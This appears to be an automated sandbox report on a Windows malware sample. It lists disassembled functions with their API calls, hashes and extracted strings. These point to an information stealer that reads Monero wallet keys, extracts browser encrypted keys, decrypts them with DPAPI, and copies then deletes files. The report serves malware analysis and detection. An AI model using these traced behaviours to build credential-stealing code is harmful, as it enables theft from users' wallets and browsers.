                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: 62ac0158d453ef5d35f8115fe211b36af464bb973204ddc11239c189e603f57f
                        • Instruction ID: 6d54c1b8793d3495684fc4185ef0cf1c4830165d365a8fa55882f12cd1eb58df
                        • Opcode Fuzzy Hash: 62ac0158d453ef5d35f8115fe211b36af464bb973204ddc11239c189e603f57f
                        • Instruction Fuzzy Hash: 3AE08CB0B55208BBDB00DB94DC0AEA977B8EB04702F008194FE0987280DA759E00EB92
                        Function 006DA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006E8B60: GetSystemTime.KERNEL32(006F0E1A,00E4A900,006F05AE,?,?,006D13F9,?,0000001A,006F0E1A,00000000,?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006E8B86
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006DA2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 006DA3FF
                        • lstrlen.KERNEL32(00000000), ref: 006DA6BC
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 006DA743
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 9f30ae3c919a4c2b462bf4945a4f620563b8e14465bad5c00a140c583062cd45
                        • Instruction ID: 1ca401f86505bb9b4fd92d7ee8ad10ea12906144ff1e899d968d8cb25c5faf94
                        • Opcode Fuzzy Hash: 9f30ae3c919a4c2b462bf4945a4f620563b8e14465bad5c00a140c583062cd45
                        • Instruction Fuzzy Hash: ACE12272D122489ADB44FBE5DC92EEE733AAF14300F51815DF51672092EF307A49CB6A
                        Function 006DD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006E8B60: GetSystemTime.KERNEL32(006F0E1A,00E4A900,006F05AE,?,?,006D13F9,?,0000001A,006F0E1A,00000000,?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006E8B86
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006DD481
                        • lstrlen.KERNEL32(00000000), ref: 006DD698
                        • lstrlen.KERNEL32(00000000), ref: 006DD6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 006DD72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: a531baa392bdf7dd6284ed278bc4922f37a320ae8523b521140aa6e2411730af
                        • Instruction ID: b6b7c6d9c1bb21b37a0ab8ff6c7ec4a0676aa24c270c4973287dc9ea85d214c9
                        • Opcode Fuzzy Hash: a531baa392bdf7dd6284ed278bc4922f37a320ae8523b521140aa6e2411730af
                        • Instruction Fuzzy Hash: FB9112729122489BDB44FBE5DC92DEE733AAF14300F51816DF50766092EF347A09CB6A
                        Function 006DD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006E8B60: GetSystemTime.KERNEL32(006F0E1A,00E4A900,006F05AE,?,?,006D13F9,?,0000001A,006F0E1A,00000000,?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006E8B86
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006DD801
                        • lstrlen.KERNEL32(00000000), ref: 006DD99F
                        • lstrlen.KERNEL32(00000000), ref: 006DD9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 006DDA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 2153df76b9ab172316bedf83e28651ea911faa4b1ae203e1715b8e38197818fe
                        • Instruction ID: 85feaf85aa480cdfff13d620e776eb989115f8f540e28d5026755a823ccd5dc0
                        • Opcode Fuzzy Hash: 2153df76b9ab172316bedf83e28651ea911faa4b1ae203e1715b8e38197818fe
                        • Instruction Fuzzy Hash: 438112719222489BDB44FBE5DC92DEE733AAF14300F51452DF507A6092EF347A09CB6A
                        Function 006DF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006D99EC
                          • Part of subcall function 006D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006D9A11
                          • Part of subcall function 006D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 006D9A31
                          • Part of subcall function 006D99C0: ReadFile.KERNEL32(000000FF,?,00000000,006D148F,00000000), ref: 006D9A5A
                          • Part of subcall function 006D99C0: LocalFree.KERNEL32(006D148F), ref: 006D9A90
                          • Part of subcall function 006D99C0: CloseHandle.KERNEL32(000000FF), ref: 006D9A9A
                          • Part of subcall function 006E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006E8E52
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,006F1580,006F0D92), ref: 006DF54C
                        • lstrlen.KERNEL32(00000000), ref: 006DF56B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 998311485-3310892237
                        • Opcode ID: bbde2639d12b5fde117d9bd0101102bd11fc48de008a77b75d9458566f03697b
                        • Instruction ID: ed5778896f8bbbcdb0928003e33bade893cf551060c9548e30ba0e27c6fc3b8b
                        • Opcode Fuzzy Hash: bbde2639d12b5fde117d9bd0101102bd11fc48de008a77b75d9458566f03697b
                        • Instruction Fuzzy Hash: 66513375D11248AADB44FBE1DC92DEE733BAF54300F41852CF40667191EE347A09CBA6
                        Function 006E70D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                        Download Yara Rule
                        Strings
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 006E718C
                        • sn, xrefs: 006E7111
                        • sn, xrefs: 006E72AE, 006E7179, 006E717C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID: sn$sn$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 3722407311-3579818175
                        • Opcode ID: 90e023a15b967659fed2fb4306a5755408c23b18fff559132053b0121aa2173a
                        • Instruction ID: 3e2c629d7f60126c23665ac3731bf2b008a0cee4d4f76c9fb11675814c95d08b
                        • Opcode Fuzzy Hash: 90e023a15b967659fed2fb4306a5755408c23b18fff559132053b0121aa2173a
                        • Instruction Fuzzy Hash: D7518DB0C053489FDB54EBA1DC85BEEB376AF54304F1480ACE20567282EB746E89CF59
                        Function 006E3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: bb50a1845723b5cfa0a36c6613615bede3e33bfda278835bf046dbb279a134b9
                        • Instruction ID: 89d5602aa7129f4174c84432070d38af42f4984818aa1a06cf3c9167030c35aa
                        • Opcode Fuzzy Hash: bb50a1845723b5cfa0a36c6613615bede3e33bfda278835bf046dbb279a134b9
                        • Instruction Fuzzy Hash: C0415171D11349ABDF04EFF6C845AFEB776AB44304F008018E5166B351EB75AA06CFA5
                        Function 006D9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006D99EC
                          • Part of subcall function 006D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006D9A11
                          • Part of subcall function 006D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 006D9A31
                          • Part of subcall function 006D99C0: ReadFile.KERNEL32(000000FF,?,00000000,006D148F,00000000), ref: 006D9A5A
                          • Part of subcall function 006D99C0: LocalFree.KERNEL32(006D148F), ref: 006D9A90
                          • Part of subcall function 006D99C0: CloseHandle.KERNEL32(000000FF), ref: 006D9A9A
                          • Part of subcall function 006E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006E8E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 006D9D39
                          • Part of subcall function 006D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nm,00000000,00000000), ref: 006D9AEF
                          • Part of subcall function 006D9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,006D4EEE,00000000,?), ref: 006D9B01
                          • Part of subcall function 006D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nm,00000000,00000000), ref: 006D9B2A
                          • Part of subcall function 006D9AC0: LocalFree.KERNEL32(?,?,?,?,006D4EEE,00000000,?), ref: 006D9B3F
                          • Part of subcall function 006D9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 006D9B84
                          • Part of subcall function 006D9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 006D9BA3
                          • Part of subcall function 006D9B60: LocalFree.KERNEL32(?), ref: 006D9BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: 3d7537ecc76fcb67d803b90b4a1f96cc9bc06a8159d6edaa3b878ab10b951225
                        • Instruction ID: 817ca88abb27183af434881ca9283342bc7783d6a82b6ef38ab58ff1989edf35
                        • Opcode Fuzzy Hash: 3d7537ecc76fcb67d803b90b4a1f96cc9bc06a8159d6edaa3b878ab10b951225
                        • Instruction Fuzzy Hash: 65313EB6D10209ABCF04DFE4DC85AEFB7BAAF48304F144519E905A7345EB349A04CBA5
                        Function 006E8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006F05B7), ref: 006E86CA
                        • Process32First.KERNEL32(?,00000128), ref: 006E86DE
                        • Process32Next.KERNEL32(?,00000128), ref: 006E86F3
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • CloseHandle.KERNEL32(?), ref: 006E8761
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
